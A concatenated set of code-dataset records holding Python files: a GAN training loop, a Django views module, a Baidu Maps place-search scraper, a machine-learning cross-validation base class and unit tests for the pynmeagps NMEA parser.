df\n\n\ntorch.manual_seed(123)\nlogger = logging.getLogger('spam_application')\nlogging.basicConfig(level=logging.INFO)\n\nreal_data = generate_data()\ndataset = CategoricalDataset(real_data)\ndata_tensor = dataset.to_onehot_flat()\n\ngenerator = create_categorical_generator(NOISE_DIM, HIDDEN_DIM, dataset.dimensions)\ndiscriminator = create_categorical_discriminator(NOISE_DIM, HIDDEN_DIM, dataset.dimensions)\n\ngenerator_solver = torch.optim.RMSprop(\n generator.parameters(), lr=learning_rate\n)\n\ndiscriminator_solver = torch.optim.RMSprop(\n discriminator.parameters(), lr=learning_rate\n)\n\nepoch_length = len(real_data) / (n_critics * batch_size)\nn_iters = int(epochs * epoch_length)\n\nfor iteration in range(n_iters):\n for _ in range(n_critics):\n # Sample real data\n rand_perm = torch.randperm(data_tensor.size(0))\n samples = data_tensor[rand_perm[:batch_size]]\n real_sample = Variable(samples)\n\n # Sample fake data\n fake_sample = generate(batch_size, NOISE_DIM, generator)\n\n # Score data\n discriminator_real = discriminator(real_sample)\n discriminator_fake = discriminator(fake_sample)\n\n # Calculate discriminator loss\n # Discriminator wants to assign a high score to real data\n # and a low score to fake data\n discriminator_loss = -(\n torch.mean(discriminator_real) -\n 
torch.mean(discriminator_fake)\n )\n\n discriminator_loss.backward()\n discriminator_solver.step()\n\n # Weight clipping for privacy guarantee\n for param in discriminator.parameters():\n param.data.clamp_(-weight_clip, weight_clip)\n\n # Reset gradient\n generator.zero_grad()\n discriminator.zero_grad()\n\n # Sample and score fake data\n fake_sample = generate(batch_size, NOISE_DIM, generator)\n discriminator_fake = discriminator(fake_sample)\n\n # Calculate generator loss\n # Generator wants discriminator to assign a high score to fake data\n generator_loss = -torch.mean(discriminator_fake)\n\n generator_loss.backward()\n generator_solver.step()\n\n # Reset gradient\n generator.zero_grad()\n discriminator.zero_grad()\n\n # Print training losses\n if int(iteration % epoch_length) == 0:\n epoch = int(iteration / epoch_length)\n logger.info('Epoch {}\\n'\n 'Discriminator loss: {}; '\n 'Generator loss: {}'\n .format(epoch,\n discriminator_loss.data.numpy(),\n generator_loss.data.numpy()))","sub_path":"DeepSpeedExamples/yet_another_MNIST_GAN/ds_mnist_gan2.py","file_name":"ds_mnist_gan2.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"164026543","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ng=100\nalpha=(20*2*np.pi)/360\n\n\ndef lecture(fichier):\n\n f = open(fichier, 'r')\n t = []\n \n for ligne in f:\n champs = ligne.split(',')\n t.append(int(champs[0].strip()))\n t=np.array(t) \n return t\n \nt = lecture(\"loigalet.csv\") \nd = g*np.sin(alpha)*t**2/2\n\nplt.plot(t,d)\nplt.ylabel('postion y')\nplt.xlabel('temps t')\nplt.show()","sub_path":"GaletFreineur/documents/loi_galet.py","file_name":"loi_galet.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"645994574","text":"from django.shortcuts import get_object_or_404, render\nfrom django.views.generic import ListView\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom summit.libs.auth.models import UserProfile, CESU\nfrom summit.apps.projects.models import Project\n\ndef index(request):\n template_name = 'apps/core/index.html'\n\n context = {\n 'pagetitle': 'Home',\n 'title': 'Home page',\n 'bannerTemplate': 'fullscreen',\n 'header': {\n 'heading1': 'Welcome to Summit',\n 'heading2': 'Your New Cooperative Ecosystem Studies Unit Project Management System',\n 'buttons': [\n {\n 'name': ('Your Dashboard' if request.user.is_authenticated\n else 'Current Projects'),\n 'link': (\"summit.libs.auth:cesu_selector\" if request.user.is_authenticated\n else \"summit.apps.projects:project_public_list\"),\n 'uses_reverse': True\n }\n \n ]\n },\n 'cssFiles': [\n ]\n }\n\n return render(request, template_name, context)\n\nclass MainView(ListView):\n template_name = 'apps/core/index.html'\n model = Project\n context_object_name = 'projects'\n\n permission_required = 'summit_projects.add_project'\n permission_denied_message = 'You do not have the correction permissions to access this page.'\n #raise_exception = False\n\n\n\n def get_context_data(self, **kwargs):\n if (self.request.user):\n user = self.request.user\n cesu = self.request.session.get('cesu')\n print(self.request.session.get('cesu_image'))\n\n print(\"session cesu: \" + str(cesu))\n print(user)\n cesu_list = CESU.objects.all()\n\n profile = None\n\n if (user.id):\n try:\n profile = UserProfile.objects.get(user=user)\n except ObjectDoesNotExist:\n profile = None\n\n if profile 
is not None:\n try:\n profile_cesu = CESU.objects.get(id=profile.assigned_group.id)\n except (ObjectDoesNotExist, AttributeError) as e:\n profile_cesu = None\n else: profile_cesu = None\n\n context = {\n 'cssFiles': [\n 'libs/mdb/DataTables/datatables.min.css',\n 'css/datatables/dashboard.css',\n ],\n 'jsFiles': [\n 'libs/mdb/DataTables/datatables.min.js',\n 'js/libs/auth/cesu_switcher.js'\n ],\n 'header': {\n 'heading1': 'Welcome to Summit',\n 'heading2': 'Your New Cooperative Ecosystem Studies Unit Project Management System',\n 'buttons': [\n {\n 'name': ('Your Dashboard' if self.request.user.is_authenticated\n else 'Current Projects'),\n 'link': (\"summit.libs.auth:cesu_selector\" if self.request.user.is_authenticated\n else \"summit.apps.projects:project_public_list\"),\n 'uses_reverse': True\n }\n \n ]\n },\n 'bannerTemplate': 'fullscreen',\n \"cesu_list\": cesu_list\n\n }\n ctx = super(MainView, self).get_context_data(**kwargs)\n ctx = {**ctx, **context}\n return ctx\n\ndef about(request, name):\n template_name = 'apps/core/about.html'\n\n context = {\n 'name': name,\n 'pagetitle': 'About',\n 'title': 'About the CPCESU',\n 'header': {\n 'background': 'imgs/coverImages/canyon-country-2400x600.jpg',\n },\n }\n\n return render(request, template_name, context)\n","sub_path":"summit/apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612621813","text":"import requests\nimport json\nimport csv\nimport time\n\ntime_start=time.time()\n\n#获取小区经纬度数据:XiaoquCoords\nfilename = \"coords.csv\"\nXiaoquCoords = []\nqueries = ['地铁站',\n '地铁线路','公交车站',\n '幼儿园','小学','初中',\n '运动健身',\n '休闲娱乐',\n '银行','ATM',\n '购物中心','超市','百货商场','便利店',\n '美食',\n '公园',\n '综合医院']\n\nradius = 10000\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n xiaoqus = [row['小区地址'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n ids = [row['id'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n lat = [row['lat'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n lng = [row['lng'] for row in reader]\nf.close()\nprint(lng)\n\nXiaoquCoords = []\nfor r in range(len(lat)):\n coord = '%s,%s'%(lat[r],lng[r])\n XiaoquCoords.append(coord)\nprint(XiaoquCoords)\n\nfor query in queries:\n rows = []\n for j in range(316,316):\n for i in range(j * 50, (j + 1) * 50 - 1):\n # 对于每个搜索字段求规定radius内\n try:\n XiaoquCoord = XiaoquCoords[i]\n contents = [xiaoqus[i],ids[i]]\n SearchUrl = 'http://api.map.baidu.com/place/v2/search?query=%s&location' \\\n '=%s&radius=%d&output=json&scope=2&filter=sort_name:distance|sort_rule:1&page_size=20&' \\\n 'ak=HRGlosvNHtwcmmUHonaFyAcVr41UzCQG' % (query, XiaoquCoord, radius)\n SearchRes = requests.get(SearchUrl)\n Details = json.loads(SearchRes.text)\n if Details.get('results') != []:\n for k in range(20):\n if k <= len(Details.get('results')) - 1:\n name = Details.get('results')[k].get('name')\n distance = Details.get('results')[k].get('detail_info').get('distance')\n contents.append(name)\n contents.append(distance)\n else:\n name = '无'\n distance = 0\n contents.append(name)\n contents.append(distance)\n else:\n name = '%d米内没有' % (radius)\n distance = 0\n contents.append(name)\n contents.append(distance)\n rows.append(contents)\n except:\n json.decoder.JSONDecodeError\n #headers = ['id','小区地址']\n #for m in range(20):\n # headers.append('距离最近的第%d个%s' 
% (m+1,query))\n # headers.append('距离最近的第%d个%s的距离' % (m+1,query))\n with open('%s.csv'%(query), 'a') as f:\n f_csv = csv.writer(f, )\n #f_csv.writerow(headers)\n f_csv.writerows(rows)\n\ntime_end=time.time()\nprint('time cost',time_end-time_start,'s')","sub_path":"final/flei.py","file_name":"flei.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"512615959","text":"parallel=True\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score, mean_squared_error, r2_score, confusion_matrix, f1_score, accuracy_score\nfrom sklearn.model_selection import ParameterGrid, StratifiedKFold, GroupKFold, KFold\nimport multiprocessing\nimport shutil\nfrom copy import copy\nimport gc\nfrom scipy.stats.mstats import mquantiles\nfrom tqdm import tqdm\nimport sys\nimport os\nHOME = os.path.expanduser('~')\nsys.path.append(f\"{HOME}/kaggle/data_analysis/library/\")\nfrom parallel_utils import parallel_process\nfrom calculate_utils import round_size\nfrom preprocessing import factorize_categoricals, get_dummies, ordinal_encode, get_ordinal_mapping\nimport category_encoders as ce\n\n\nkaggle = 'home-credit-default-risk'\n\n\nclass Model(metaclass=ABCMeta):\n @abstractmethod\n def train(self):\n pass\n\n @abstractmethod\n def predict(self):\n pass\n\n # @abstractmethod\n def predict_proba(self):\n pass\n\n # @abstractmethod\n def accuracy(self):\n pass\n\n # @abstractmethod\n def cross_val_score(self):\n pass\n\n def sc_metrics(self, y_test, y_pred):\n try:\n if self.metric.count('logloss'):\n score = log_loss(y_test, y_pred)\n elif self.metric == 'auc':\n score = roc_auc_score(y_test, y_pred)\n elif self.metric=='l2':\n score = r2_score(y_test, y_pred)\n elif self.metric=='rmse':\n score = np.sqrt(mean_squared_error(y_test, y_pred))\n elif self.metric=='mse':\n score = np.sqrt(mean_squared_error(y_test, y_pred))\n elif self.metric=='accuracy':\n y_pred_max = np.argmax(y_pred, axis=1) # 最尤と判断したクラスの値にする\n score = sum(y_test == y_pred_max) / len(y_test)\n else:\n print('SCORE CALICULATION ERROR!')\n except ValueError:\n self.logger.info(f\"\"\"\n# ==============================\n# WARNING!!!!!\n# {self.target} is True Only.\n# y_test Unique: {np.unique(y_test)}\n# y_pred Unique: {np.unique(y_pred)}\n# ==============================\n \"\"\")\n return score\n\n def sc_confusion_matrix(self, y_test, y_pred):\n #========================================================================\n # F1Scoreを最大化するポイントで混同行列を算出する\n #========================================================================\n if self.objective=='binary':\n threshold = 0.5\n binary_method = lambda x: 1 if x>=threshold else 0\n def to_binary_f1():\n bi_test = list(map(binary_method, y_test))\n bi_pred = list(map(binary_method, y_pred))\n f1 = f1_score(bi_test, bi_pred)\n return f1\n\n best_f1 = to_binary_f1()\n best_threshold = threshold\n tmp = copy(best_threshold)\n meta1 = 0\n meta2 = 1\n\n # 二分探索でF1 Scoreを最大化する閾値を探る\n while True:\n threshold = (tmp + meta1) / 2\n f1 = to_binary_f1()\n print(f\"Best : {best_f1} | F1 : {f1}\")\n print(f\"Threshold : {threshold} | Tmp : {tmp} | Meta1 : {meta1} | Meta2 : {meta2}\")\n tmp_f1 = copy(f1) # 1つ目の閾値におけるF1を保存しておく\n if f1>best_f1:\n #========================================================================\n # meta1を使い算出した閾値でBest F1を更新したら, 下記を更新して再ループ\n # meta1: stay\n # meta2: 元のtmp\n # tmp : Best F1を更新したthreshold\n 
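# (in English: the midpoint of meta1 and tmp improved F1, so it becomes the new tmp and the old tmp becomes meta2)\n                    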
#========================================================================\n best_f1 = f1\n best_threshold = threshold\n meta2 = copy(tmp)\n tmp = copy(best_threshold)\n elif f1best_f1:\n #========================================================================\n # meta2を使い算出したthresholdでBest F1を更新したら, 下記を更新して再ループ\n # meta1: 元のtmp\n # meta2: stay\n # tmp : Best F1を更新したthreshold\n #========================================================================\n best_f1 = f1\n best_threshold = threshold\n meta1 = copy(tmp)\n tmp = copy(best_threshold)\n elif f1=f1:\n meta2 = copy(tmp)\n tmp = copy(best_threshold)\n elif tmp_f10:\n if sc_score > self_stop[n_fold]:\n stop_cnt+=1\n stop_score_list.append(sc_score)\n if stop_cnt==3:\n self.cv_score = np.mean(stop_score_list)\n return self\n\n list_score.append(sc_score)\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n ' Feature Importance '\n feim_name = f'{n_fold}_importance'\n feim = self.df_feature_importance(feim_name=feim_name)\n\n if len(self.cv_feim) == 0:\n self.cv_feim = feim.copy()\n else:\n self.cv_feim = self.cv_feim.merge(feim, on='feature', how='inner')\n\n self.cv_score = np.mean(list_score)\n self.val_score_list = list_score\n self.prediction = pred_val.values\n\n self.logger.info(f'''\n#========================================================================\n# Train End.''')\n [self.logger.info(f'''\n# Validation No: {i} | {self.metric}: {score}''') for i, score in enumerate(list_score)]\n self.logger.info(f'''\n# Params : {params}\n# CV score : {self.cv_score}\n#======================================================================== ''')\n\n # Parameter Tuningの場合はscoreがあればOK\n if params_tune:\n return self\n\n importance = []\n for fold_no in range(fold):\n if len(importance) == 0:\n importance = self.cv_feim[f'{fold_no}_importance'].values.copy()\n else:\n importance += self.cv_feim[f'{fold_no}_importance'].values\n\n self.cv_feim['avg_importance'] = importance / fold\n self.cv_feim.sort_values(by=f'avg_importance',\n ascending=False, inplace=True)\n self.cv_feim['rank'] = np.arange(len(self.cv_feim))+1\n\n return self\n\n\n def cross_prediction(self, train, test, key, target, fold_type='stratified', fold=5, group_col_name='', params={}, num_boost_round=0, early_stopping_rounds=0, oof_flg=True, self_kfold=False, self_stop=[], comp_name='', scaler=False, self_predict=[]):\n\n if len(self_predict):\n df_base_id = pd.concat([self_predict[key].to_frame(), test.reset_index()[key].to_frame()], axis=0)\n else:\n df_base_id = pd.concat([train.reset_index()[key].to_frame(), test.reset_index()[key].to_frame()], axis=0)\n self.target = target\n list_score = []\n best_iter_list = []\n self.fold_pred_list = []\n self.fold_val_list = []\n self.cv_feim = pd.DataFrame([])\n self.prediction = np.array([])\n val_stack = pd.DataFrame()\n\n self.objective = params['objective']\n if self.objective=='multiclass':\n self.val_pred = np.zeros((len(train), 13))\n else:\n self.val_pred = np.zeros(len(train))\n\n # Y Setting\n y = train[target].copy()\n # if self.objective.count('reg'):\n # y_min = y.min()\n # y -= y_min\n # y = np.log1p(y)\n\n ' KFold '\n if fold_type == 'stratified':\n folds = StratifiedKFold(n_splits=fold, shuffle=True, random_state=self.seed) # 1\n kfold = folds.split(train, y)\n elif fold_type == 'group':\n if group_col_name == '':\n raise ValueError(f'Not exist group_col_name.')\n folds = GroupKFold(n_splits=fold)\n kfold = folds.split(train, y, groups=train[group_col_name].values)\n elif fold_type == 'kfold':\n 
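# plain KFold: shuffled row-wise split with no stratification or grouping\n            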
folds = KFold(n_splits=fold, shuffle=True, random_state=self.seed) # 1\n kfold = folds.split(train, y)\n elif fold_type == 'self':\n kfold = self_kfold\n\n use_cols = [f for f in train.columns if f not in self.ignore_list]\n self.use_cols = sorted(use_cols) # カラム名をソートし、カラム順による学習への影響をなくす\n\n if key in train.columns:\n train.set_index(key, inplace=True)\n if key in test.columns:\n test.set_index(key, inplace=True)\n\n # if sys.argv[4]=='ods':\n if True:\n self.kfold = zip(*kfold)\n else:\n self.kfold = list(kfold)\n # for n_fold, (trn_idx, val_idx) in enumerate(zip(*kfold)):\n\n result_list = []\n\n for n_fold, (trn_idx, val_idx) in enumerate(self.kfold):\n\n # card_id split\n # if sys.argv[4]=='ods' or sys.argv[5]=='no_out':\n if True:\n x_train, y_train = train.loc[train.index.isin(trn_idx), :][use_cols], y.loc[train.index.isin(trn_idx)].values\n x_val, y_val = train.loc[train.index.isin(val_idx), :][use_cols], y.loc[train.index.isin(val_idx)].values\n else:\n x_train, y_train = train[self.use_cols].iloc[trn_idx, :], y.iloc[trn_idx].values\n x_val, y_val = train[self.use_cols].iloc[val_idx, :], y.iloc[val_idx].values\n print(x_train.shape, x_val.shape, len(val_idx))\n print(y_train.max(), y_train.min())\n\n if n_fold == 0:\n if params['objective']=='lambdarank':\n test_cols = self.use_cols\n test_cols.remove('rank')\n x_test = test[test_cols]\n else:\n x_test = test[self.use_cols]\n\n # GBDTのみ適用するargs\n gbdt_args = {}\n if num_boost_round:\n gbdt_args['num_boost_round'] = num_boost_round\n gbdt_args['early_stopping_rounds'] = early_stopping_rounds\n\n self.estimator = self.train(\n x_train=x_train,\n y_train=y_train,\n x_val=x_val,\n y_val=y_val,\n params=params,\n gbdt_args=gbdt_args\n )\n\n # Tmp Result\n y_pred = self.estimator.predict(x_val)\n best_iter_list.append(self.estimator.best_iteration)\n\n\n if len(self_predict):\n #========================================================================\n # StackしたいOOFの作成\n train_id_list = list(x_train.index)\n self_valid = self_predict[~self_predict[key].isin(train_id_list)]\n y_valid = self_valid[target].values\n x_valid = self_valid[self.use_cols]\n y_pred = self.estimator.predict(x_valid)\n self_valid[f'pred_{n_fold}'] = y_pred\n self_valid = self_valid[[key, f'pred_{n_fold}']].set_index(key)\n del x_valid\n gc.collect()\n #========================================================================\n\n best_iter_list.append(self.estimator.best_iteration)\n\n self.fold_model_list.append(self.estimator)\n\n #========================================================================\n # Scoring\n if scaler:\n y_val = scaler.inverse_transform(y_val.reshape(-1, 1)).ravel()\n y_pred = scaler.inverse_transform(y_pred.reshape(-1, 1)).ravel()\n sc_score = self.sc_metrics(y_val, y_pred)\n else:\n sc_score = self.sc_metrics(y_valid, y_pred)\n #========================================================================\n\n list_score.append(sc_score)\n if self.viz_detail:\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n ' OOF for Stackng '\n if len(val_stack):\n val_stack = val_stack.join(self_valid.copy())\n else:\n base_train = self_predict[[key, target]]\n val_stack = base_train.set_index(key).join(self_valid.copy())\n\n print(f\"Train Valid Stack: {val_stack.shape}\")\n\n\n else:\n x_val['prediction'] = y_pred\n x_val[target] = y_val\n result_list.append(x_val.reset_index()[[key, 'prediction', target]])\n\n self.fold_pred_list.append(y_pred)\n self.fold_val_list.append(y_val)\n self.fold_model_list.append(self.estimator)\n\n if 
scaler:\n y_val = scaler.inverse_transform(y_val.reshape(-1, 1)).ravel()\n y_pred = scaler.inverse_transform(y_pred.reshape(-1, 1)).ravel()\n sc_score = self.sc_metrics(y_val, y_pred)\n else:\n sc_score = self.sc_metrics(y_val, y_pred)\n\n list_score.append(sc_score)\n if self.viz_detail:\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n test_pred = self.estimator.predict(x_test)\n\n if scaler:\n test_pred = scaler.inverse_transform(test_pred.reshape(-1, 1)).ravel()\n\n # 対数化を解除\n # if self.objective.count('reg'):\n # test_pred = np.expm1(test_pred)\n # test_pred += y_min + 5\n\n if len(self.prediction) == 0:\n self.prediction = test_pred\n else:\n self.prediction += test_pred\n\n ' Feature Importance '\n feim_name = f'{n_fold}_importance'\n feim = self.df_feature_importance(feim_name=feim_name)\n\n if len(self.cv_feim) == 0:\n self.cv_feim = feim.copy()\n else:\n self.cv_feim = self.cv_feim.merge(feim, on='feature', how='inner')\n\n #========================================================================\n # CV SCORE & F1SCORE\n #========================================================================\n self.val_score_list = list_score\n self.cv_score = np.mean(list_score)\n self.iter_avg = np.mean(best_iter_list)\n if len(self_predict):\n pred_cols = [col for col in val_stack.columns if col.count('pred_')]\n val_stack['prediction'] = val_stack[pred_cols].mean(axis=1)\n\n if params['objective']=='binary':\n val_stack = pd.concat(result_list, axis=0)\n y_train = val_stack[target].values\n y_allval = val_stack['prediction'].values\n self.train_stack = val_stack\n self.sc_confusion_matrix(y_train, y_allval)\n\n\n self.logger.info(f'''\n#========================================================================\n# Train End.''')\n [self.logger.info(f'''\n# Validation No: {i} | {self.metric}: {score}''') for i, score in enumerate(list_score)]\n self.logger.info(f'''\n# Params : {params}\n# CV score : {self.cv_score}\n#======================================================================== ''')\n\n if self.objective=='binary':\n self.logger.info(f'''\n# Accuracy : {self.accuracy} {self.true}/{len(test)}\n# F1 score : {self.f1}\n# TP:{self.cmx[0]} FP:{self.cmx[2]}\n# FN:{self.cmx[1]} TN:{self.cmx[3]}\n#======================================================================== ''')\n\n ' fold数で平均をとる '\n self.prediction = self.prediction / fold\n\n\n ' OOF for Stackng '\n if oof_flg:\n pred_stack = test.reset_index()[[key, target]]\n pred_stack['prediction'] = self.prediction\n result_list.append(pred_stack)\n\n if len(self_predict):\n val_stack.reset_index(inplace=True)\n result_list.append(val_stack[pred_stack.columns])\n result_stack = pd.concat(result_list, axis=0, ignore_index=True)\n result_stack = df_base_id.merge(result_stack, how='inner', on=key)\n self.logger.info(\n f'result_stack shape: {result_stack.shape} | cnt_id: {len(result_stack[key].drop_duplicates())}')\n else:\n result_stack = []\n\n importance = []\n for fold_no in range(fold):\n if len(importance) == 0:\n importance = self.cv_feim[f'{fold_no}_importance'].values.copy()\n else:\n importance += self.cv_feim[f'{fold_no}_importance'].values\n\n self.cv_feim['avg_importance'] = importance / fold\n self.cv_feim.sort_values(by=f'avg_importance',\n ascending=False, inplace=True)\n self.cv_feim['rank'] = np.arange(len(self.cv_feim))+1\n\n self.result_stack = result_stack\n\n return 
self\n","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":25615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"371371715","text":"'''\r\nHelper, property, static and magic method tests for pynmeagps\r\n\r\nCreated on 3 Oct 2020\r\n\r\n*** NB: must be saved in UTF-8 format ***\r\n\r\n:author: semuadmin\r\n'''\r\n\r\nimport unittest\r\nimport datetime\r\nfrom pynmeagps import NMEAReader, NMEAMessage, NMEAMessageError, NMEATypeError # pylint: disable=unused-import\r\nimport pynmeagps.nmeahelpers as nmh\r\n\r\n\r\nclass StaticTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.maxDiff = None\r\n self.messageCRAP = '$GNRMC,,%$£'\r\n self.messageBLANK = '$GNRMC,,A,,N,,W,0.046,,,,,A,V*0F'\r\n self.messageGLL = '$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*68\\r\\n'\r\n self.messagePUBX = '$PUBX,00,103607.00,5327.03942,N,00214.42462,W,104.461,G3,29,31,0.085,39.63,-0.007,,5.88,7.62,8.09,6,0,0*69\\r\\n'\r\n self.messageBADCK = '$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*22\\r\\n'\r\n self.msgGLL = NMEAReader.parse(self.messageGLL)\r\n self.msgPUBX00 = NMEAReader.parse(self.messagePUBX)\r\n\r\n def tearDown(self):\r\n pass\r\n\r\n#*******************************************\r\n# Helper methods\r\n#*******************************************\r\n\r\n def testInt2Hex(self):\r\n res = nmh.int2hexstr(15)\r\n self.assertEqual(res, '0F')\r\n res = nmh.int2hexstr(104)\r\n self.assertEqual(res, '68')\r\n\r\n def testGetParts(self):\r\n res = nmh.get_parts(self.messageGLL)\r\n self.assertEqual(res, ('GN', 'GLL', ['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'], '68'))\r\n\r\n def testGetPartsCRAP(self): # test badly formed NMEA message\r\n EXPECTED_ERROR = \"Badly formed message $GNRMC,,%$£\"\r\n with self.assertRaises(NMEAMessageError) as context:\r\n nmh.get_parts(self.messageCRAP)\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testGetContent(self):\r\n res = nmh.get_content(self.messageGLL)\r\n self.assertEqual(res, 'GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A')\r\n\r\n def testCalcChecksum(self):\r\n res = nmh.calc_checksum(self.messageGLL)\r\n self.assertEqual(res, '68')\r\n res = nmh.calc_checksum(self.messagePUBX)\r\n self.assertEqual(res, '69')\r\n\r\n def testGoodChecksum(self):\r\n res = nmh.isvalid_cksum(self.messageGLL)\r\n self.assertEqual(res, True)\r\n\r\n def testBadChecksum(self):\r\n res = nmh.isvalid_cksum(self.messageBADCK)\r\n self.assertEqual(res, False)\r\n\r\n def testDMM2DDD(self):\r\n res = nmh.dmm2ddd('5314.12345', 'LA')\r\n self.assertEqual(res, 53.235391)\r\n res = nmh.dmm2ddd('00214.12345', 'LN')\r\n self.assertEqual(res, 2.235391)\r\n res = nmh.dmm2ddd('12825.12344', 'LN')\r\n self.assertEqual(res, 128.418724)\r\n\r\n def testDDD2DMM(self):\r\n res = nmh.ddd2dmm(53.75000, 'LA')\r\n self.assertEqual(res, '5345.00000')\r\n res = nmh.ddd2dmm(-2.75000, 'LN')\r\n self.assertEqual(res, '00245.00000')\r\n res = nmh.ddd2dmm(128.418724, 'LN')\r\n self.assertEqual(res, '12825.12344')\r\n res = nmh.ddd2dmm(\"\", 'LN')\r\n self.assertEqual(res, \"\")\r\n\r\n def testDate2UTC(self):\r\n res = nmh.date2utc('')\r\n self.assertEqual(res, \"\")\r\n res = nmh.date2utc('120320')\r\n self.assertEqual(res, datetime.date(2020, 3, 12))\r\n\r\n def testTime2UTC(self):\r\n res = nmh.time2utc('')\r\n self.assertEqual(res, \"\")\r\n res = nmh.time2utc('081123.000')\r\n self.assertEqual(res, datetime.time(8, 11, 23))\r\n\r\n def 
testTime2str(self):\r\n res = nmh.time2str(datetime.time(8, 11, 23))\r\n self.assertEqual(res, '081123.00')\r\n\r\n def testDate2str(self):\r\n res = nmh.date2str(datetime.date(2021, 3, 7))\r\n self.assertEqual(res, '070321')\r\n\r\n def testdeg2dms(self):\r\n res = nmh.deg2dms(53.346, 'LA')\r\n self.assertEqual(res, ('53°20′45.6″N'))\r\n res = nmh.deg2dms(-2.5463, 'LN')\r\n self.assertEqual(res, ('2°32′46.68″W'))\r\n res = nmh.deg2dms(\"\", 'LN')\r\n self.assertEqual(res, (\"\"))\r\n\r\n def testdeg2dmm(self):\r\n res = nmh.deg2dmm(-53.346, 'LA')\r\n self.assertEqual(res, ('53°20.76′S'))\r\n res = nmh.deg2dmm(2.5463, 'LN')\r\n self.assertEqual(res, ('2°32.778′E'))\r\n res = nmh.deg2dmm(\"\", 'LN')\r\n self.assertEqual(res, (\"\"))\r\n\r\n def testKnots2spd(self):\r\n res = nmh.knots2spd(1.0, 'MS')\r\n self.assertAlmostEqual (res, 0.5144447324, 5)\r\n res = nmh.knots2spd(1.0, 'FS')\r\n self.assertAlmostEqual (res, 1.68781084, 5)\r\n res = nmh.knots2spd(1.0, 'mph')\r\n self.assertAlmostEqual (res, 1.15078, 5)\r\n res = nmh.knots2spd(1.0, 'kmph')\r\n self.assertAlmostEqual (res, 1.852001, 5)\r\n\r\n def testKnots2spdBAD(self):\r\n EXPECTED_ERROR = \"Invalid conversion unit CRAP - must be in ['MS', 'FS', 'MPH', 'KMPH'].\"\r\n with self.assertRaises(KeyError) as context:\r\n nmh.knots2spd(1.0, 'CRAP')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n EXPECTED_ERROR = \"Invalid knots value CRAP - must be float or integer.\"\r\n with self.assertRaises(TypeError) as context:\r\n nmh.knots2spd('CRAP', 'MS')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testMsgDesc(self):\r\n res = nmh.msgdesc('GGA')\r\n self.assertEqual(res, \"Global positioning system fix data\")\r\n res = nmh.msgdesc('UBX03')\r\n self.assertEqual(res, \"PUBX-SVSTATUS Satellite Status\")\r\n res = nmh.msgdesc('XXX')\r\n self.assertEqual(res, \"Unknown msgID XXX\")\r\n\r\n#*******************************************\r\n# NMEAMessage property methods\r\n#*******************************************\r\n\r\n def testTalkerS(self):\r\n res = self.msgGLL.talker\r\n self.assertEqual(res, 'GN')\r\n\r\n def testTalkerP(self):\r\n res = self.msgPUBX00.talker\r\n self.assertEqual(res, 'P')\r\n\r\n def testMsgIDS(self):\r\n res = self.msgGLL.msgID\r\n self.assertEqual(res, 'GLL')\r\n\r\n def testMsgIDP(self):\r\n res = self.msgPUBX00.msgID\r\n self.assertEqual(res, 'UBX')\r\n\r\n def testPayloadS(self):\r\n res = self.msgGLL.payload\r\n self.assertEqual(res, ['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'])\r\n\r\n def testPayloadP(self):\r\n res = self.msgPUBX00.payload\r\n self.assertEqual(res, ['00', '103607.00', '5327.03942', 'N', '00214.42462', 'W', '104.461', 'G3', '29', '31', '0.085', '39.63', '-0.007', '', '5.88', '7.62', '8.09', '6', '0', '0'])\r\n\r\n def testChecksumS(self):\r\n res = self.msgGLL.checksum\r\n self.assertEqual(res, '68')\r\n\r\n def testChecksumP(self):\r\n res = self.msgPUBX00.checksum\r\n self.assertEqual(res, '69')\r\n\r\n#*******************************************\r\n# NMEAMessage static methods\r\n#*******************************************\r\n\r\n def testSerializeS(self):\r\n res = self.msgGLL.serialize()\r\n self.assertEqual(res, b'$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*68\\r\\n')\r\n\r\n def testSerializeP(self):\r\n res = self.msgPUBX00.serialize()\r\n self.assertEqual(res, b'$PUBX,00,103607.00,5327.03942,N,00214.42462,W,104.461,G3,29,31,0.085,39.63,-0.007,,5.88,7.62,8.09,6,0,0*69\\r\\n')\r\n\r\n def testStrS(self): # double check that 
